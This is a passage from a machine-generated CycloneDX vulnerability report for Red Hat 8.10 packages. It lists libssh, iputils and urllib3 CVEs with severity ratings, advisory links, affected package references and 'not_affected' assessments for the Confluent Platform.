          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-48964",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "ping in iputils before 20250602 allows a denial of service (application error in adaptive ping mode or incorrect data collection) via a crafted ICMP Echo Reply packet, because a zero timestamp can lead to large intermediate values that have an integer overflow when squared during statistics calculations. NOTE: this issue exists because of an incomplete fix for CVE-2025-47268 (that fix was only about timestamp calculations, and it did not account for a specific scenario where the original timestamp in the ICMP payload is zero).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-48964"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:17558"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18162"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-48964"
        },
        {
          "url": "https://bugzilla.redhat.com/2382657"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2382657"
        },
        {
          "url": "https://bugzilla.suse.com/show_bug.cgi?id=1243772"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-48964"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18162.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:17558"
        },
        {
          "url": "https://github.com/iputils/iputils/commit/afa36390394a6e0cceba03b52b59b6d41710608c"
        },
        {
          "url": "https://github.com/iputils/iputils/issues"
        },
        {
          "url": "https://github.com/iputils/iputils/releases/tag/20250602"
        },
        {
          "url": "https://github.com/iputils/iputils/security/advisories/GHSA-25fr-jw29-74f9"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-48964.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18162.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48964"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7670-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-48964"
        }
      ],
      "published": "2025-07-22T18:15:36+00:00",
      "updated": "2026-06-17T09:30:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "20180629-11.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-50181",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disable redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-50181"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-50181"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-pq67-6m6q-mj2v"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50181"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
        }
      ],
      "published": "2025-06-19T01:15:24+00:00",
      "updated": "2026-06-17T09:34:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-50182",
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 2.2.0 and prior to 2.5.0, urllib3 does not control redirects in browsers and Node.js. urllib3 supports being used in a Pyodide runtime utilizing the JavaScript Fetch API or falling back on XMLHttpRequest. This means Python libraries can be used to make HTTP requests from a browser or Node.js. Additionally, urllib3 provides a mechanism to control redirects, but the retries and redirect parameters are ignored with Pyodide; the runtime itself determines redirect behavior. This issue has been patched in version 2.5.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-50182"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-50182"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-48p4-8xcf-vxj5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50182"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
        }
      ],
      "published": "2025-06-19T02:15:17+00:00",
      "updated": "2026-06-17T09:34:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
